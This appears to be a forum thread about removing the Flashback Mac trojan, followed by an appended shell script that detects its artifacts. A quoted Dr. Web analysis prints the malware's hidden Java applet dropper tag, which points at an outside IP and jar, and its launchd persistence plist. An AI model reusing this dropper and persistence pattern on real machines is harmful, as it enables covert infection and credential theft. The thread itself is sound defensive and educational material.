.rserv wants to connect to cuojshtbohnt.com
I have the message:
.rserv wants to connect to cuojshtbohnt.com
what is .rserv? I googled it and couldn't locate anything legitimate.
thanks
MacBook Pro, Mac OS X (10.6.8)
I have the same thing happening. Isn't it odd that it's on the same day? Google it now and every entry is from today, within the last 2 hours.
😮
I'll do a text level search of the whole drive and report back if I find something.
GL
Is .libgmalloc.dylib a legitimate file that is in some way corrupted by the malware, or is .libgmalloc.dylib itself bad?
If it is a legitimate file that is corrupted by the malware, how does one restore a proper version of it?
Thanks.
Bob Mayo wrote:
Is .libgmalloc.dylib a legitimate file
No.
Basically, any shared code library whose name begins with a dot (.), which renders it invisible in Finder, is unlikely to be legitimate. Note that there are many shared code libraries on your Mac, and there are quite a few files whose names begin with dots (usually containing configuration or registration data). It's the combination of code and dot as first character that makes it highly suspicious and probably not legitimate.
(post deleted -- somehow didn't notice fane_j gave the answer I was going to give)
Has anyone determined what mkeeper (MacKeeper) and com.zeobit (MacKeeper developer) are doing here? From Dr. Web on the BackDoor.Flashback.39 (This was brought up quickly earlier in this thread, but AFAIK never fully explored.)
http://vms.drweb.com/virus/?i=1816029
<object type="application/x-java-applet" width="0" height="0">
<param name="s" value="1"/>
<param name="q" value="2"/>
<param name="svname" value="com.zeobit.keep">
<param name="svbname" value="mkeeper">
<param name="dname" value="Software Update">
<param name="lurl" value="31.31.79.87">');
<param name="archive" value="al-2.jar">
<param name="code" value="a.apl">
</object>
The exploit saves an executable file to the hard disk, along with a plist file responsible for launching it.
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.zeobit.keep</string>
<key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>4212</integer>
<key>StandardErrorPath</key><string>/dev/null</string>
<key>StandardOutPath</key><string>/dev/null</string>
</dict>
</plist>
After launching, the trojan checks for the presence of the following components and, if at least one of them is present, stops executing:
Deleted-incorrect data
It is not a legitimate file, and should be deleted. By default there is no file of that name or type in the Shared user directory.
WZZZ wrote:
Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here
" value="com.zeobit.keep">
I can't say for certain, but I'm fairly sure they've nothing to do with it, just like Adobe didn't have anything to do with it. These are just ID strings (which could be any valid string) used by the malware's author to confuse and obfuscate. I suspect that the identifier actually used by MacKeeper is not "com.zeobit.keep" but something else. With the Adobe string the difference was just one character, "com.adobe.reader" instead of "com.adobe.Reader".
Methinks this is the one instance where MacKeeper is not to blame.
Malware has been known to hijack other application names, as we've seen with Flash in the past. MacKeeper hasn't been known to be malware, though the company behind it has pushed some questionable marketing practices and the product is not the best (it appears crudely coded in order to rake in revenue while providing minimal benefit). Many people recommend folks uninstall or avoid MacKeeper, and the presence of references to it in the latest threats do raise question, but so far it's not too conclusive.
WZZZ wrote:
Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here
The second one looks identical to the one that started this thread, only executing ~/.mkeeper instead of ~/.rserv.
The first one I never saw before. But there is a reference to some Java code called al-2.jar.
Marco g wrote:
If anybody is interested, I renamed it to "flserv" and uploaded it.
Thanks for doing that. It's the first sample I've been able to collect with this variant.
Readers will be happy to know the results of the following scans:
ClamXav identified it as OSX.Flashback-8.
Sophos Home Edition 8 identified it as OSX/Flshplyr-D.
MacScan did not detect anything.
12 of 42 A-V scanners detected it on virustotal.com and the link will take you to the results. Strangely enough it had not been previously uploaded. Positive identification was achieved by avast!, BitDefender, clamav, DrWeb, F-Secure, Kaspersky and Sophos, among others. Users are cautioned that "the service was not designed as a tool to perform antivirus comparative analyses, but as a tool that checks suspicious samples with several antivirus solutions and helps antivirus labs by forwarding them the malware they fail to detect."
Has anybody been able to detect what this trojan exactly does? Either variant 1 for browsers or variant 2 system/user installation? Some kind of keylogger, or does it spy on passwords that have been saved in Firefox/Safari?
Matt Durben wrote:
Has anybody been able to detect what this trojan exactly does? Either variant 1 for browsers or variant 2 system/user installation? Some kind of keylogger, or does it spy on passwords that have been saved in Firefox/Safari?
I'm certain both the Type 1 and Type 2 infections have the same goal, to use your network apps (browsers and Skype have been identified) to accomplish their goals. It has been observed to do re-directs to advertising sites, which I suppose could result in a small amount of compensation from the advertisers, but Intego believe there is a more lucrative goal which I just looked up earlier this evening in a February post Flashback Mac Trojan Horse Infections Increasing with New Variant where they say:
This malware patches web browsers and network applications essentially to search for user names and passwords. It looks for a number of domains – websites such as Google, Yahoo!, CNN; bank websites; PayPal; and many others. Presumably, the people behind this malware are looking for both user names and passwords that they can immediately exploit – such as for a bank website – as well as others that may be reused on different sites. (Hint: don’t use the same password for all websites!)
In a subsequent article they figured out that the malware uses Twitter to communicate the results of this harvest back to the "Mother Ship" periodically, using a specific hash tag for each date and deleting the messages after they get what they need. The message contains the unique identifier for that user and machine along with the username/password/website information.
I have created a user tip and malware checker/removal tool: https://discussions.apple.com/docs/DOC-3271
For Office 2004 users that are infected we are seeing this in their crash logs:
dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib
dianeoforegon wrote:
For Office 2004 users that are infected we are seeing this in their crash logs:
dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib
After removing the file the system will still try to load the file whenever Office or other programs are launched, so you will have to reset the system so it does not try to load the file. To do this, run the following commands in the Terminal:
defaults delete ~/.MacOSX/environment DYLD_INSERT_LIBRARIES
launchctl unsetenv DYLD_INSERT_LIBRARIES
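The thread describes three artifacts of this infection: a dot-prefixed shared library in the Shared user directory, a launch agent whose ProgramArguments point at a hidden file in a home directory, and a DYLD_INSERT_LIBRARIES entry that keeps dyld trying to load the library after it is deleted. The following script is an added example, not code from this thread or from Apple; it checks a profile for all three. Directory and plist paths are passed as arguments (on a Mac: /Users/Shared, ~/.MacOSX/environment.plist and ~/Library/LaunchAgents), and the fixture it builds is constructed sample data, not a real infection.

```shell
#!/bin/sh
# Added example: look for the three Flashback leftovers discussed above.
# Works with plain POSIX tools (find, grep) so it can be tried on any system.

# Indicator 1: dot-prefixed .dylib files (invisible in Finder) in a directory.
find_hidden_dylibs() {
    [ -d "$1" ] || return 0
    find "$1" -maxdepth 1 -type f -name '.*.dylib'
}

# Indicator 2: environment.plist still names a library for dyld to insert.
plist_has_dyld_insert() {
    [ -f "$1" ] && grep -q '<key>DYLD_INSERT_LIBRARIES</key>' "$1"
}

# Indicator 3: a launchd job whose program is a hidden file under /Users/<name>/.
launch_agent_runs_hidden_program() {
    [ -f "$1" ] && grep -q '<string>/Users/[^/<]*/\.[^/<]*</string>' "$1"
}

# Print one line per finding: shared dir, environment plist, LaunchAgents dir.
scan_profile() {
    shared_dir="$1"; env_plist="$2"; agents_dir="$3"
    find_hidden_dylibs "$shared_dir" | while read -r lib; do
        echo "hidden dylib: $lib"
    done
    if plist_has_dyld_insert "$env_plist"; then
        echo "DYLD_INSERT_LIBRARIES set in: $env_plist"
    fi
    for agent in "$agents_dir"/*.plist; do
        if launch_agent_runs_hidden_program "$agent"; then
            echo "launch agent runs hidden program: $agent"
        fi
    done
}

# Number of findings (0 when the profile is clean).
count_findings() {
    scan_profile "$@" | grep -c . || true
}

# Constructed fixture mimicking the artifacts quoted in the thread.
# The paths, names and plist contents are sample data for this example.
make_demo_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/Shared" "$root/.MacOSX" "$root/LaunchAgents"
    : > "$root/Shared/.libgmalloc.dylib"   # hidden library, should be flagged
    : > "$root/Shared/libreal.dylib"       # ordinary library, should be ignored
    cat > "$root/.MacOSX/environment.plist" <<'EOF'
<plist version="1.0"><dict>
<key>DYLD_INSERT_LIBRARIES</key><string>/Users/Shared/.libgmalloc.dylib</string>
</dict></plist>
EOF
    cat > "$root/LaunchAgents/com.zeobit.keep.plist" <<'EOF'
<plist version="1.0"><dict>
<key>Label</key><string>com.zeobit.keep</string>
<key>ProgramArguments</key><array><string>/Users/alice/.mkeeper</string></array>
</dict></plist>
EOF
    cat > "$root/LaunchAgents/com.example.benign.plist" <<'EOF'
<plist version="1.0"><dict>
<key>ProgramArguments</key><array><string>/Users/alice/bin/backup</string></array>
</dict></plist>
EOF
    echo "$root"
}

# Demo run against the constructed fixture.
demo_root=$(make_demo_fixture)
scan_profile "$demo_root/Shared" "$demo_root/.MacOSX/environment.plist" "$demo_root/LaunchAgents"
echo "findings: $(count_findings "$demo_root/Shared" "$demo_root/.MacOSX/environment.plist" "$demo_root/LaunchAgents")"
rm -rf "$demo_root"
```

Run as `sh check_flashback.sh` to see the three findings from the fixture; on a real machine call `scan_profile /Users/Shared ~/.MacOSX/environment.plist ~/Library/LaunchAgents` instead. The `find` pattern deliberately matches only dot-prefixed .dylib files, following fane_j's rule that it is the combination of a code library and a leading dot that is suspicious, not either alone.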